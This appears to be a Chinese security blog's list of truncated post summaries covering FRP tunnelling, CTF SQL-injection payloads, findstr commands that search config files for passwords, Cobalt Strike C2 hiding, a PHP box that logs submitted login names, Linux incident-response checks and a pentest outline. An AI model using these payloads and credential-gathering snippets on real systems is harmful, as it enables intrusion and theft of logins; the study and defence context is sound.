摘要:
FRP代理 附上官网的部分介绍: 通过在具有公网 IP 的节点上部署 frp 服务端,可以轻松地将内网服务穿透到公网,同时提供诸多专业的功能特性,这包括: 客户端服务端通信支持 TCP、QUIC、KCP 以及 Websocket 等多种协议。 采用 TCP 连接流式复用,在单个连接间承载更多请求,节 阅读全文
摘要:
# CTF刷题 ## WEB ### buuoj.cn-[极客大挑战 2019]EasySQL 万能公式 ```php 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1 ``` http://43ffd150-ad6f-4a6f-bfe1-09e448646 阅读全文
摘要:
一、windows 字符串查找: 在当前目录下查找所有后缀文件中是否包含password字符串 findstr /i /s "password" *.config findstr /i /s "password" *.ini findstr /i /s "password" *.xml 文件查找: 阅读全文
摘要:
这些天在研究C2隐藏技术,遇到C2客户端验证profile出现加载不了的错误,特此记录一下: 参考文章:http://xia0yu.win/java/40.html 使用 compile_time 修改Beacon的PE头时间时候出现了错误 [-] Error(s) while compiling 阅读全文
摘要:
使用户登录时候发送链接到后台服务器即可。简单逻辑代码实现如下: 一、收信箱子 <?php if(empty($_GET)) { }else{ $name = $_GET["name"]; $name = $name."\r\n"; $stream = fopen("box.txt", "a"); f 阅读全文
摘要:
1、登录日志 /var/log/:该文件夹存放了Linux操作系统的系统日志 /var/log/lastlog:记录了用户最后一次登录的信息 查看方式:lastlog 排查:是否存在恶意用户,及恶意用户登录的时间 /var/log/btmp:所有用户登录失败的信息,ssh登录(爆破) 文件查看:la 阅读全文
摘要:
网络排查: netstat -pantu:查看当前端口开放情况 top:实时状态 ps:瞬时状态 ps -ef:详细显示进程状态信息 lsof:详细显示进程打开的文件 用户排查: /etc/passwd:排查是否存在用户ID为0,组ID为0的可疑用户,并确定该用户是否可登录 /etc/shadow: 阅读全文
摘要:
宝塔登录密码加密方式 此处分析的实验环境为宝塔版本:免费版 7.6.0 tools.py调用set_panel_pwd()函数设置密码 result = sql.table('users').where('id=?',(1,)).setField('password',public.password 阅读全文
摘要:
<?php for($k=1;$k<6;$k++) { $str = "https://edu.51cto.com/courselist/index-zh5-p".$k.".html"; $preg = "/<div class=\"(.*?)\" title=\"(.*?)\">(.*?)<\/d 阅读全文
摘要:
渗透总的思路 靶场:Billu_b0x 信息收集(端口、服务、目录、中间件、信息泄露......) WEB打点(SQL注入、文件上传、文件包含、SSRF......),getshell 提权 内网渗透 权限维持 一、信息收集 nmap -A 192.168.10.6 dirsearch -u "ht 阅读全文